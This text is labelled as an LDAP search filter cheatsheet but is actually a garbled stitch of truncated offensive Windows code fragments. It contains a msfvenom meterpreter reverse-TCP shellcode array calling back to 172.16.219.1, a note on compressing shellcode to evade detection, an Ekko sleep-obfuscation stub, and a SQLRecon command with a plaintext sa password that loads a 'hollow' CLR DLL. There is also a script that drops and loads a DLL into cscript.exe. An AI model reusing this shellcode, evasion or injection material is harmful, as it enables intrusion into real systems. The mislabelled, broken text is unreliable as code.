title | author | date | source | notoc |
---|---|---|---|---|
LDAP Search Filter Cheatsheet | Jon LaBelle | January 4, 2021 | | true |
#include <windows.h>
int main() {
    HANDLE file = CreateFileA(".\\test.txt", GENERIC_WRITE, FILE_SHARE_WRITE, NULL, OPEN_ALWAYS, FILE_ATTRIBUTE_NORMAL|FILE_ATTRIBUTE_ENCRYPTED|FILE_FLAG_DELETE_ON_CLOSE, NULL);
    if (!file || file == INVALID_HANDLE_VALUE) {
        return GetLastError();
    }
    CloseHandle(file);
    return 0;
}
/**
  Compression using undocumented API in rdpbase.dll
  RDPCompressEx supports four algorithms: MPPC-8K, MPPC-64K, NCRUSH and XCRUSH.
  This code supports all except NCRUSH.
  The MPPC compression ratio is very similar to LZSS, so this could be quite useful for shellcode trying to evade detection.
  NCRUSH compression appears to work but fails for decompression.
using System;
using System.Collections.Generic;
using System.Linq;
using System.Runtime.CompilerServices;
using System.Net;
using System.Reflection;
using System.Runtime.InteropServices;
namespace Test
{
    // CCOB IS THE GOAT
#include <Core.h>
#include <Win32.h>
#include <Structs.h>
#include <Sleep.h>
#include <Utils.h>
SEC( text, C ) VOID Ekko ( DWORD SleepTime, PINSTANCE Instance)
{
//C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe /target:library c:\temp\hollow.cs
//SQLRecon.exe -a Local -s SQL02 -d master -u sa -p Password123 -m clr -o c:\temp\hollow.dll -f BaconTime
using System;
using System.Data;
using System.Data.SqlClient;
using System.Data.SqlTypes;
using System.Diagnostics;
using System.IO;
using System.Runtime.InteropServices;
using Microsoft.SqlServer.Server;
#include <windows.h>
#include <stdio.h>
extern WORD WINAPI RtlRunOnceExecuteOnce(RTL_RUN_ONCE *once, PRTL_RUN_ONCE_INIT_FN func, void *param, void **context);
typedef ULONG (WINAPI* RTL_RUN_ONCE_INIT_FN)(_Inout_ PRTL_RUN_ONCE RunOnce, _Inout_opt_ PVOID Parameter, _Inout_opt_ PVOID *Context);
// msfvenom LPORT=8080 LHOST=172.16.219.1 -p windows/x64/meterpreter/reverse_tcp -f c
unsigned char shellcode_bin[] =
"\xfc\x48\x83\xe4\xf0\xe8\xcc\x00\x00\x00\x41\x51\x41\x50"
"\x52\x51\x56\x48\x31\xd2\x65\x48\x8b\x52\x60\x48\x8b\x52"
using System;
using System.Diagnostics;
using System.Reflection;
using System.Runtime.CompilerServices;
using System.Runtime.InteropServices;
namespace ShittyHook
{
    internal class Program
    {
The following script is designed to create artifacts that teams can use to hunt new or interesting capabilities.
The following tabletop is based on the code here: https://github.com/code-scrap/DynamicWrapperDotNet
This script is self-contained. It should dynamically write a DLL to disk and load it into cscript.exe.
To invoke: cscript.exe stranger_things.js
This example expects a 64-bit system.
// Copyright (C) 2022 Evan McBroom
// If you are using Visual Studio, you will need to disable the "Edit and Continue" feature.
// Prng based off of Parker Miller's
// "Multiplicative Linear Congruential Generator"
// https://en.wikipedia.org/wiki/Lehmer_random_number_generator
namespace mlcg {
    constexpr uint32_t modulus() {
        return 0x7fffffff;
    }